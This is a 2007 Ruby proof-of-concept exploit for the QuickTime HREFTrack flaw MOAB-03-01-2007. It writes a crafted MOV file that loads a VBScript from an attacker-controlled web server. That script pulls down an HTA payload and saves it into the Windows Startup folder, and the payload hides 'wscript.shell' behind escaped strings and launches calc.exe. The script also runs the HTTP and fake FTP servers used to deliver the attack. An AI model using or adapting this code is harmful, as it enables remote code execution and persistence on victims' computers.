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Posted on 04 January 2007

#!/usr/bin/ruby # # (c) 2006 LMH <lmh [at] info-pull.com> # Original scripting and POC by Aviv Raff (http://aviv.raffon.net). # # Description: # Exploit for MOAB-03-01-2007. If argument 'serve' is passed, it uses port 21 for running the # fake FTP server (required). HTTP server port can be modified but it's # not recommended. Adjust as necessary. # # see http://projects.info-pull.com/moab/MOAB-03-01-2007.html require 'socket' require 'fileutils' require 'webrick' trap 0, proc { puts "-- Terminating: #{$$}" } REMOTE_HOST = "" # Modify to match IP address or hostname REMOTE_URL = "http://#{REMOTE_HOST}/" # Modify to match target path (ex. /mypath) TARGET_SCRIPT = "on error resume next " + "Set c = CreateObject("ADODB.Connection") " + "co = "Driver={Microsoft Text Driver (*.txt; *.csv)};Dbq=#{REMOTE_URL};Extensions=txt;" " + "c.Open co " + "set rs =CreateObject("ADODB.Recordset") " + "rs.Open "SELECT * from qtpoc.txt", c " + "rs.Save "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\poc.hta", adPersistXML " + "rs.close " + "c.close " + "window.close " HTA_PAYLOAD = "<script>q='%77%73%63%72%69%70';</script> " + "<script>q+='%74%2E%73%68%65%6C%6C';</script> " + "<script>a=new ActiveXObject(unescape(q));</script> " + "<script>a.run('%windir%\\System32\\calc.exe');</script> " + # executes calc.exe "<script>window.close();</script> " HREFTRACK_COD = "A<res://mmcndmgr.dll/prevsym12.htm#%29%3B%3C/style%3E%3Cscript src="#{REMOTE_URL}q.vbs" " + "language="vbscript"%3E%3C/script%3E%3C%21--//|> T<>" TARGET_DIRECTORY = "served" # # ---- Real fun starts here ---- # puts "++ Preparing files..." # # Prepare the MOV file with the HREFTrack pointing at our script. # original_mov = File.read("qtpoc.mov") # Prepare directory structure FileUtils::mkdir(TARGET_DIRECTORY) puts "++ MOV file...." # Write the new MOV file f = File.new(File.join(TARGET_DIRECTORY, "qtpoc.mov"), "w") f.write(original_mov) f.close puts "++ Script file...." # Write the script file f = File.new(File.join(TARGET_DIRECTORY, "q.vbs"), "w") f.print(TARGET_SCRIPT) f.close puts "++ HTA payload file...." # Write the new HTA file (payload) f = File.new(File.join(TARGET_DIRECTORY, "qtpoc.txt"), "w") f.print(HTA_PAYLOAD) f.close # # win32 doesn't like fork ;-) # if ARGV[0] == "serve" # HTTP server... via Webrick puts "++ Done. Starting HTTP server..." web_server = WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot =>TARGET_DIRECTORY) fork do begin web_server.start rescue exit end end # FTP server.... puts "++ Done. Starting FTP server..." begin ftp_server = TCPServer.new('localhost', 21) rescue web_server.shutdown exit end # 220 Microsoft FTP Service # USER anonymous # 331 Anonymous access allowed, send identity (e-mail name) as password. # PASS IEUser@ # 230 Anonymous user logged in. # (...) while (ftp_session = ftp_server.accept) puts "++ FTP: #{ftp_session.gets}" # TODO: implement fake responses just to satisfy it. ftp_session.close end # finished web_server.shutdown end